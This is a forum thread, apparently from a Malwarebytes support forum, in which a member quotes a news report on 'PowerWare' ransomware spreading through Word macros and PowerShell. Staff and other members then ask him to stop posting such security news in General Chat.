Jump to content

New ransomware ”PowerWare”


Recommended Posts

- Quote 

A newly discovered ransomware called ‘PowerWare’ uses a native Windows tool to encrypt files. The malware has been discovered by the security researchers from Carbon Black who report ‘PowerWare’ uses the Windows Powershell to encrypt files.


Instead of infecting systems with a malicious .EXE file, this new ransomware uses a Word macro. Victims receive an email with a fake invoice that consists of a Word document. This document requires the user to allow macros to run in order to see its contents.

When the user enables the macro, the ransomware calls the Windows Command Prompt (cmd.exe) to start the PowerShell with options to download a script. This script contains the actual encryption routines.

- Unquote

read on in http://www.myce.com/news/new-ransomware-powerware-uses-native-windows-function-encrypt-files-78976/?utm_content=bufferefc7f&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer

Link to post
Share on other sites

Yepper.  I have submitted other scripted process encryption trojans.  Any process can be setup to use the Microsoft CryptoAPI.

sman  is paranoid because "they" are out to get him.  They being the Organization for the Organized.





Link to post
Share on other sites

Jokes apart, the forum has section for 'new threats signatures' targeted by MBAM, but 'GC' is the only section to post news on latest threats, and as such kept posted, whenever any article of interest is found.. Now, by posting this, I'm no different from the author of the article/source website, who are giving attention to it..

Even the so-called, IT people/organizations, in the field, have been 'victims' of 'Cybercrime', so it's better to stay informed..


Link to post
Share on other sites

35 minutes ago, sman said:

Jokes apart,

The thing is, we are not joking. We are trying to communicate a serious, sincere message.

As has been repeatedly mentioned online and offline, by forum staff and forum volunteers, directly and indirectly, there is a line between being "informed" and being paranoid.
You have often mentioned your "high-stakes" online trading and other high-exposure activities on the internet.
And many members far more expert than I have advised you how to minimize that risk.
To eliminate the risk altogether, the only solution is to disconnect entirely from the internet. Period.

Most security-savvy users here already keep track of this stuff in other ways (and/or are already information overloaded).
Those forum members and Malwarebytes customers who are not security conscious to begin with likely are not stopping in several times a day to the Malwarebytes support forum to find out about hacked hospital medical records, Linux malware and other tangential topics, or even the latest ransomware flavor of the day.

Yes, you are certainly free to post every day with links to internet stories that interest you, if you have the time, interest and energy to do so.
At this point, however, it's become a bit "too much" FUD for many of us.

<EOD for me>

Link to post
Share on other sites

I don't think anyone's asking you to give up on your security and news, but to tone it down a bit and stop spamming the General Chat with IT Security-related news. If you are to post an article about every Ransomware that is discovered, you're in (and we are as well) for a very, very long ride. This forum is mainly a support platform for Malwarebytes and it's customers, led by employees and volunteers who tries to assist others, not a general IT Security discussion forum (even though conversations about this can happen sometimes).

Honestly, there are other forums who wouldn't mind you posting articles about every new threats that emerges, and even encourage such discussions around them. I suggest you to take a look at these and post your articles there. Wilders Security is one (you have the same level of "security concern" as the users there).

Most of the articles you post are too complex for the normal user to understand or the people who actually understand the topic discussed (such as experts here), don't have the time to discuss the content of the article and/or don't see the need to do it here. Like dd said, users have their own source of information when it comes to news, and therefore, it isn't needed to use these forums as one to inform them.

Link to post
Share on other sites

  • Root Admin
5 hours ago, sman said:

Even the so-called, IT people/organizations, in the field, have been 'victims' of 'Cybercrime', so it's better to stay informed..


Anyone with true Expert level status that personally gets hit by one of these better turn in their club card. Organizations yes because even though an Expert may know what should be done often their hands are tied by what Management will allow.

As for staying informed there are now hundreds of news sites, blogs, and feeds that it's information overload for most people and those sites do a much better job than a few posts here do. Users that are share similar concerns as you certainly already follow many security sties.

Yes, please check out the Wilder Security Forums - they love that type of information and discussion as that is what their forum is built around.

Link to post
Share on other sites

Seriously, an after thought.. (Today the Bullion market had a sharp fall and was in the midst of that, so obviously missed out finer points on the post) ..

Think of 'Malware' and MB immediately comes to mind, so 'synonymous' with..And with the modern era now about 'malware'. MB's role need no emphasis.. Agreed, MB doesn't target all, areas targeted would certainly be of interest..  

Take the 'cryptography' aspect. MB's blog post on that certainly points to it's interest in it and so is my post on that for views.

Then this post, on 'Ransomware' when a MBARW is in development, in line for views/protection cover for this threat too..

These are specific areas of interest of MB and is it not proper to look for views on? TIA..

Link to post
Share on other sites

  • Root Admin

I'm sorry but this is not a Training Facility and has rules to prevent public discussion as it leads to much more misinformation than valid good information which then leads to users obtaining the wrong information and possibly causing more problems with their computer. The vast majority of public news is actually only skimming the surface on how, when, why most infections work. The majority of in-depth information is discussed and analyzed in private forums, emails, chats, physical meetings, private industry, etc. Not all but a lot of the NEWS is skimming the surface. Some public sites do go into great depth of detail but not most as they don't know and they're simply jumping on the bandwagon reposting the same old news.

Bottom line is that yes there are others that share the same fears you do and want to live in that fear. That is not something that I think should be shared as it's propaganda at that level. We share and so do other security sites that prevention and backups are the real key here regardless of what infection is here today or tomorrow. Regurgitating the same news that 100's of sites are posting is not really helping anyone here. There are typically three types of people here on our forums. Those that are already infected and looking for help, not news about how to prevent or how infections work. Those that are Helpers/Experts, etc that try to guide users to the right location and proper means and method to get their computer cleaned. Those that Administer and manage the forum. There are other visitors here for other reasons but they're numbers are very small. Page views on NEWS of xyz infections are very low (again most users that are concerned about that have already typically read about them) We used to run a dedicated forum about such alerts but the time and trouble to maintain vs the page views just was not worth it. Often some pages that took hours to post and verify information would end up with less than a dozen views. So as others have said and we're all trying to be nice here is tell you that such information posted daily or often is not really wanted or needed. Most users do not appear to share the same fear that you appear to even though we've provided many references as to why and how to not have to be afraid of said threats.

Now if you're posting for real discussion about infection xyz again please visit Wilders Security Forums as that is their bread and butter discussions and it will keep you very busy reading and posting to them. Here our main goal is cleanup and prevention. For training there are sites that do train home users on how to find, and safely remove infections.

If you're interested in helping others with removal of Malware please visit one of the sites below to sign up for a training school.

The following are websites who host training facilities: United Network of Instructors and Trained Eliminators


Thank you again


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.